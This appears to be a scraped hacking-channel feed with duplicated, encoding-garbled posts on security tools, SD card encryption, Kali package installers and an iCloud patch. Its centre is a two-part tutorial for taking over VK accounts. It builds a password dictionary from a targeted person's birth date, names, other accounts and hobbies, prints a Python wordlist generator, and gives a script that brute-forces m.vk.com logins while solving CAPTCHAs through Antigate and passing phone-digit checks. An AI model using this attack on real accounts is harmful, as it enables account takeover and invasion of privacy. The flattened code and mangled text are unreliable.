β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Some security tools :
[DefenseMatrix](https://github.com/K4YT3X/DefenseMatrix) | Full security solution for Linux Servers
[Kernelpop](https://github.com/spencerdodd/kernelpop) | kernel privilege escalation enumeration and exploitation framework
[Lynis](https://github.com/CISOfy/lynis) | Security auditing tool for Linux, macOS, and UNIX-based systems.
[linux-explorer](https://github.com/intezer/linux-explorer) | Easy-to-use live forensics toolbox for Linux endpoints
[Katoolin](https://github.com/LionSec/katoolin) | Automatically install all Kali linux tools in distros like Ubuntu
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Some security tools :
[DefenseMatrix](https://github.com/K4YT3X/DefenseMatrix) | Full security solution for Linux Servers
[Kernelpop](https://github.com/spencerdodd/kernelpop) | kernel privilege escalation enumeration and exploitation framework
[Lynis](https://github.com/CISOfy/lynis) | Security auditing tool for Linux, macOS, and UNIX-based systems.
[linux-explorer](https://github.com/intezer/linux-explorer) | Easy-to-use live forensics toolbox for Linux endpoints
[Katoolin](https://github.com/LionSec/katoolin) | Automatically install all Kali linux tools in distros like Ubuntu
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
k4yt3x/defense-matrix
Express security essentials deployment for Linux Servers - k4yt3x/defense-matrix
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Use computer file encryption software to implement SD card encryption and protect SD card file security.
https://docs.microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlocker-overview
Currently, there are many computer file encryption software in China, which not only support U disk encryption, but also mostly support SD card file encryption, and the operation is relatively simple. The author used a " Encryption Software" (download address: which is a very simple and easy to use, and at the same time very powerful computer file encryption software. Compared with similar computer file encryption software, it has the following characteristics:
1. You can encrypt computer hard drives, encrypt disk files, and also hide disks and hidden disk folders.
2. Not only can encrypt disk files, but also U disk files, realize U disk encryption, and encrypt USB storage device files.
3. You can encrypt the SD card and set a password for the SD card. At the same time, SD card files can also be encrypted.
4. The only way to control the access rights of encrypted files is to allow only the content of encrypted files to be read but not to copy encrypted files, only to modify encrypted files but not to delete encrypted files, only to open encrypted files but not to save as local disk , And prohibit dragging encrypted files, prohibit printing encrypted files, etc.
Regarding SD card files, through the " Computer File Encryption Software", you can not only set a password for the SD card, but also encrypt the files in the SD card and control the access rights after opening the SD card files.
> for android:
https://play.google.com/store/apps/details?id=com.file_encryption.android&hl=en&gl=US
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Use computer file encryption software to implement SD card encryption and protect SD card file security.
https://docs.microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlocker-overview
Currently, there are many computer file encryption software in China, which not only support U disk encryption, but also mostly support SD card file encryption, and the operation is relatively simple. The author used a " Encryption Software" (download address: which is a very simple and easy to use, and at the same time very powerful computer file encryption software. Compared with similar computer file encryption software, it has the following characteristics:
1. You can encrypt computer hard drives, encrypt disk files, and also hide disks and hidden disk folders.
2. Not only can encrypt disk files, but also U disk files, realize U disk encryption, and encrypt USB storage device files.
3. You can encrypt the SD card and set a password for the SD card. At the same time, SD card files can also be encrypted.
4. The only way to control the access rights of encrypted files is to allow only the content of encrypted files to be read but not to copy encrypted files, only to modify encrypted files but not to delete encrypted files, only to open encrypted files but not to save as local disk , And prohibit dragging encrypted files, prohibit printing encrypted files, etc.
Regarding SD card files, through the " Computer File Encryption Software", you can not only set a password for the SD card, but also encrypt the files in the SD card and control the access rights after opening the SD card files.
> for android:
https://play.google.com/store/apps/details?id=com.file_encryption.android&hl=en&gl=US
β β β Uππ»βΊπ«Δπ¬πβ β β β
Docs
BitLocker Overview
Explore BitLocker deployment, configuration, and recovery options for IT professionals and device administrators.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦"Smart" brute force hack any Vk user !
A method designed for average users. For him, we will need a special dictionary tailored for a specific person. Let's figure out the structure of our dictionary:
Personal data. This includes the date of birth (11/17/1992 = 1711, 1992, 17111992), age (1992, 2017 = 2017, 1992, 24), first name (Stas = stas, ctac) and last name (Ivanov = ivanov).
Accounts from other social. networks and mail services (twitter.com/stasik_ku, facebook.com/stasss1992, stasss92@mail.ru = stasik_iv, stasss1992, stasss92).
Hobbies (football, swimming, youth = football, swimming, molodejka, molodegka).
There is also a VK page, which says which passwords should be specified, which characters are possible and the most common passwords.
The result is a sheet of 14 lines. But we still need to create password combinations from it that our victim could create.
I present to you my small python script that does this.
#! coding:utf-8 import sys,os
razdel = ['_',':',';']
def uniq(seq): seen = set()
seen_add = seen.add
return [x for x in seq if not (x in seen or seen_add(x))]
def brute_words(words): new_words = []
for i in words: new_words.append(i)
new_words.append(i[0].upper() + i[1:])
new_words.append(i[0].upper() + i[1:-1] + i[-1].upper())
new_words.append(i.upper())
for j in spisok: new_words.append(i + j)
for m in razdel: new_words.append(j + m + i)
new_words.append(j + i)
new_words.append(i * 2 + j)
new_words.append(j * 2 + i)
new_words.append(i[0].upper() + i[1:] + j)
new_words.append(i[0].upper() + i[1:-1] + i[-1].upper() + j)
return uniq(new_words)
def generate(words_file): o = open(words_file, 'r')
words = o.read().splitlines()for i in brute_words(words): print(i)
def main(): try: argv1 = sys.argv[1]
generate(argv1)
except IndexError: print("ΠΡΠΆΠ½ΠΎ ΡΠΊΠ°Π·Π°ΡΡ ΡΠ°ΠΉΠ»")
except IOError: print("ΠΠ΅Ρ ΡΠ°ΠΊΠΎΠ³ΠΎ ΡΠ°ΠΉΠ»Π°")if name == "main": main()
Out of 14, 1272 options were obtained. Let me give you a part.
Molodegkactac
MolodegkActac
molodejka_molodegka
Stasss92molodejka
stasss92molodegka
molodegka_stasss92
molodegka:stasss92
molodegka;stasss92
stasss1992swimming
swimming_stasss1992
Kurayginctac
KuraygiNctac
kurayginkuraygin
kuraygin_kuraygin
molodegka171119921711199217111992molodegka
molodegkamolodegka1711199224 1711_24
Great, now we will automate the search for passwords through the mobile version of VK with a small script.
π¦"Smart" brute force hack any Vk user !
A method designed for average users. For him, we will need a special dictionary tailored for a specific person. Let's figure out the structure of our dictionary:
Personal data. This includes the date of birth (11/17/1992 = 1711, 1992, 17111992), age (1992, 2017 = 2017, 1992, 24), first name (Stas = stas, ctac) and last name (Ivanov = ivanov).
Accounts from other social. networks and mail services (twitter.com/stasik_ku, facebook.com/stasss1992, stasss92@mail.ru = stasik_iv, stasss1992, stasss92).
Hobbies (football, swimming, youth = football, swimming, molodejka, molodegka).
There is also a VK page, which says which passwords should be specified, which characters are possible and the most common passwords.
The result is a sheet of 14 lines. But we still need to create password combinations from it that our victim could create.
I present to you my small python script that does this.
#! coding:utf-8 import sys,os
razdel = ['_',':',';']
def uniq(seq): seen = set()
seen_add = seen.add
return [x for x in seq if not (x in seen or seen_add(x))]
def brute_words(words): new_words = []
for i in words: new_words.append(i)
new_words.append(i[0].upper() + i[1:])
new_words.append(i[0].upper() + i[1:-1] + i[-1].upper())
new_words.append(i.upper())
for j in spisok: new_words.append(i + j)
for m in razdel: new_words.append(j + m + i)
new_words.append(j + i)
new_words.append(i * 2 + j)
new_words.append(j * 2 + i)
new_words.append(i[0].upper() + i[1:] + j)
new_words.append(i[0].upper() + i[1:-1] + i[-1].upper() + j)
return uniq(new_words)
def generate(words_file): o = open(words_file, 'r')
words = o.read().splitlines()for i in brute_words(words): print(i)
def main(): try: argv1 = sys.argv[1]
generate(argv1)
except IndexError: print("ΠΡΠΆΠ½ΠΎ ΡΠΊΠ°Π·Π°ΡΡ ΡΠ°ΠΉΠ»")
except IOError: print("ΠΠ΅Ρ ΡΠ°ΠΊΠΎΠ³ΠΎ ΡΠ°ΠΉΠ»Π°")if name == "main": main()
Out of 14, 1272 options were obtained. Let me give you a part.
Molodegkactac
MolodegkActac
molodejka_molodegka
Stasss92molodejka
stasss92molodegka
molodegka_stasss92
molodegka:stasss92
molodegka;stasss92
stasss1992swimming
swimming_stasss1992
Kurayginctac
KuraygiNctac
kurayginkuraygin
kuraygin_kuraygin
molodegka171119921711199217111992molodegka
molodegkamolodegka1711199224 1711_24
Great, now we will automate the search for passwords through the mobile version of VK with a small script.
"Smart" brute force hack any Vk user ! partβ-2
#! coding: utf8
import grab, re, urllib2from antigate import AntiGatefrom grab import GrabTimeoutErrorfrom time import sleep
cap_key = '123 '
def anti(key, file): Captcha Ρ Antigate
try:
try: data = AntiGate(key, file)
return data
except KeyboardInterrupt:
print("name")
except:
anti(key, file)
def save(url, file): #L
site = urllib2.urlopen(url)
f = open(file, 'wb')
f.write(site.read())
def cap_solve(img):
save(img, 'captcha.jpg')
key = anti(cap_key, 'captcha.jpg')
return keydef brute(login, passwords, save):
out = open(save, 'w')
psswrds = open(passwords,'r')
try:
int(login)
prefix = True
except:
prefix = False
g = grab.Grab()
g.go('http://m.vk.com')
for line in psswrds:
psswrd = line.rstrip('\r\n')
g.doc.set_input('email', login)
g.doc.set_input('pass', psswrd)
g.doc.submit()
if g.doc.text_search(u'captcha'):
all_captchas = re.findall('"(/captcha.php[^"]*)"', g.response.body)[0]
captcha = '' + all_captchas
key = cap_solve(captcha)
g.doc.set_input('email', login)
g.doc.set_input('pass', psswrd)
g.doc.set_input('captcha_key', str(key))
g.doc.submit()
print("cap")
if 'ΠΠΎΠ΄ΡΠ²Π΅ΡΠ΄ΠΈΡΡ' in g.response.body:
if prefix:
prefix1 = g.doc.rex_search('\+[0-9]*').group(0)
prefix2 = g.doc.rex_search(' [0-9]*').group(0)
pre1 = re.findall('[0-9]{1,}', prefix1)[0]
pre2 = re.findall('[0-9]{1,}', prefix2)[0]
login = login.replace(pre1, '')
login = login.replace(pre2, '')
g.set_input('code', login)
g.submit()
print(login + ':' + psswrd + '--success')
out.write(login + ':' + psswrd + '\n')
else:
out.write(login + ':' + psswrd + '\n')
else:
if g.doc.rex_search('[^>]+').group(0) == 'Login | VK':
print(login + ':' + psswrd + '--fail')
else:
print(login + ':' + psswrd + '--success')
out.write(login + ':' + psswrd + '\n')
out.close()
psswrds.close()
Naturally, the example is not optimized. You can also add proxies, multithreading and other goodies, but you will do it yourself if it is interesting. But the script is able to enter the missing digits in VKontakte protection itself when entering from another country, and also, using Antigate, easily enters Captch'i that appear after 5-6 attempts to enter from one IP.
β β β Uππ»βΊπ«Δπ¬πβ β β β
#! coding: utf8
import grab, re, urllib2from antigate import AntiGatefrom grab import GrabTimeoutErrorfrom time import sleep
cap_key = '123 '
def anti(key, file): Captcha Ρ Antigate
try:
try: data = AntiGate(key, file)
return data
except KeyboardInterrupt:
print("name")
except:
anti(key, file)
def save(url, file): #L
site = urllib2.urlopen(url)
f = open(file, 'wb')
f.write(site.read())
def cap_solve(img):
save(img, 'captcha.jpg')
key = anti(cap_key, 'captcha.jpg')
return keydef brute(login, passwords, save):
out = open(save, 'w')
psswrds = open(passwords,'r')
try:
int(login)
prefix = True
except:
prefix = False
g = grab.Grab()
g.go('http://m.vk.com')
for line in psswrds:
psswrd = line.rstrip('\r\n')
g.doc.set_input('email', login)
g.doc.set_input('pass', psswrd)
g.doc.submit()
if g.doc.text_search(u'captcha'):
all_captchas = re.findall('"(/captcha.php[^"]*)"', g.response.body)[0]
captcha = '' + all_captchas
key = cap_solve(captcha)
g.doc.set_input('email', login)
g.doc.set_input('pass', psswrd)
g.doc.set_input('captcha_key', str(key))
g.doc.submit()
print("cap")
if 'ΠΠΎΠ΄ΡΠ²Π΅ΡΠ΄ΠΈΡΡ' in g.response.body:
if prefix:
prefix1 = g.doc.rex_search('\+[0-9]*').group(0)
prefix2 = g.doc.rex_search(' [0-9]*').group(0)
pre1 = re.findall('[0-9]{1,}', prefix1)[0]
pre2 = re.findall('[0-9]{1,}', prefix2)[0]
login = login.replace(pre1, '')
login = login.replace(pre2, '')
g.set_input('code', login)
g.submit()
print(login + ':' + psswrd + '--success')
out.write(login + ':' + psswrd + '\n')
else:
out.write(login + ':' + psswrd + '\n')
else:
if g.doc.rex_search('[^>]+').group(0) == 'Login | VK':
print(login + ':' + psswrd + '--fail')
else:
print(login + ':' + psswrd + '--success')
out.write(login + ':' + psswrd + '\n')
out.close()
psswrds.close()
Naturally, the example is not optimized. You can also add proxies, multithreading and other goodies, but you will do it yourself if it is interesting. But the script is able to enter the missing digits in VKontakte protection itself when entering from another country, and also, using Antigate, easily enters Captch'i that appear after 5-6 attempts to enter from one IP.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Vk
VK | Welcome!
VK is the largest European social network with more than 100 million active users. Our goal is to keep old friends, ex-classmates, neighbors and colleagues in touch.
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π GUI software installers in Kali Linux:
1) Open a terminal and enter the following commands to install the Software Center in Kali.
$ sudo apt update
$ sudo apt install gnome-software
2) After the installation is complete, you will need to use vi or your favorite text editor to edit the /etc/apt/sources.list file for the application to work .
3) Add the following lines to the file.
$ sudo vi /etc/apt/sources.list
deb http://kali.download/kali/ kali-rolling main non-free contrib
deb http://ftp.debian.org/debian stable main contrib non-free
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb http://http.kali.org/kali kali-last-snapshot main non-free contrib
deb http://http.kali.org/kali kali-experimental main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib
4) To open the Application Center, run the gnome-software command from a terminal.
Installing Synaptic
5) Open a terminal and enter the following commands to install Synaptic in Kali.
$ sudo apt update
$ sudo apt install synaptic
6) After the installation is complete, use a search similar to the Application Center or run:
$ synaptic
7) Now you can search for and install new applications or remove existing ones from your system.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π GUI software installers in Kali Linux:
1) Open a terminal and enter the following commands to install the Software Center in Kali.
$ sudo apt update
$ sudo apt install gnome-software
2) After the installation is complete, you will need to use vi or your favorite text editor to edit the /etc/apt/sources.list file for the application to work .
3) Add the following lines to the file.
$ sudo vi /etc/apt/sources.list
deb http://kali.download/kali/ kali-rolling main non-free contrib
deb http://ftp.debian.org/debian stable main contrib non-free
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb http://http.kali.org/kali kali-last-snapshot main non-free contrib
deb http://http.kali.org/kali kali-experimental main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib
4) To open the Application Center, run the gnome-software command from a terminal.
Installing Synaptic
5) Open a terminal and enter the following commands to install Synaptic in Kali.
$ sudo apt update
$ sudo apt install synaptic
6) After the installation is complete, use a search similar to the Application Center or run:
$ synaptic
7) Now you can search for and install new applications or remove existing ones from your system.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
iCloud windows application should be updated now ! new critical vulnerability has been patched.
#Vulnerabilities
#Vulnerabilities
Forwarded from UNDERCODE NEWS
